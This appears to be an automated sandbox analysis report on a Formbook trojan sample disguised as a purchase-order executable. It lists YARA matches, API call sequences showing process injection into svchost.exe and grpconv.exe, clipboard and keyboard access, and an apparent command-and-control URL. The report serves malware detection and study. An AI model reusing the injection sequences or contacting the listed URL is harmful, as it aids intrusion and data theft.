            Source: grpconv.exe, 00000005.00000002.3870343838.00000000053EA000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.000000000350A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,742845F0,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,6FE0CB00,6FE0C2F0,SetCapture,ClientToScreen,6FE0C530,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,742845F0,0_2_0047C81C

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: Purchase Order_ AEPL-2324-1126.exe
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0046A07E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004710F1 NtdllDialogWndProc_W,6FE0C580,6FE0C6F0,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_004710F1
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045034C GetParent,NtdllDialogWndProc_W,0_2_0045034C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044036A NtdllDialogWndProc_W,0_2_0044036A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00440306 NtdllDialogWndProc_W,0_2_00440306
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0047132F NtdllDialogWndProc_W,0_2_0047132F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00440338 NtdllDialogWndProc_W,0_2_00440338
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_0046A38E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_0045039B
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_004404E8
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044048E NtdllDialogWndProc_W,0_2_0044048E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044786A NtdllDialogWndProc_W,0_2_0044786A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,742845F0,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,6FE0CB00,6FE0C2F0,SetCapture,ClientToScreen,6FE0C530,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,742845F0,0_2_0047C81C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,0_2_004478AC
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,0_2_004479A0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_004629B7
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0047EA6F NtdllDialogWndProc_W,0_2_0047EA6F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00447ABC SendMessageW,NtdllDialogWndProc_W,0_2_00447ABC
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00447B4E NtdllDialogWndProc_W,0_2_00447B4E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00454CFC NtdllDialogWndProc_W,0_2_00454CFC
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00454D4A NtdllDialogWndProc_W,0_2_00454D4A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0042FDA6 ClientToScreen,6FE0C5D0,NtdllDialogWndProc_W,0_2_0042FDA6
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0042FE05 742845F0,NtdllDialogWndProc_W,0_2_0042FE05
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00470E96
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C593 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03774340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03774650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772C70 NtFreeVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04594650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04594340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_045935C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_045939B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04592B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04593010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04593090 NtSetValueKey
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04593D70 NtOpenThread
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_04593D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_002F90F0 NtCreateFile
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_002F9260 NtReadFile
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_002F9350 NtDeleteFile
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_002F93F0 NtClose
            Source: C:\Windows\SysWOW64\grpconv.exe Code function: 5_2_002F9550 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,74FD5590,74FD7ED0,CreateProcessAsUserW,74FD5030,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,74FD7F30
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 57 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 100 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 272 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: String function: 00445AE0 appears 65 times
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 04595130 appears 58 times
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 0454B970 appears 277 times
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 045CEA12 appears 86 times
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 045A7E54 appears 102 times
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: String function: 045DF290 appears 105 times
Source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471824943.00000000047AD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order_ AEPL-2324-1126.exe
Source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472756758.0000000004603000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order_ AEPL-2324-1126.exe
Source: Purchase Order_ AEPL-2324-1126.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/15
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | File created: C:\Users\user~1\AppData\Local\Temp\cunili
Source: Purchase Order_ AEPL-2324-1126.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
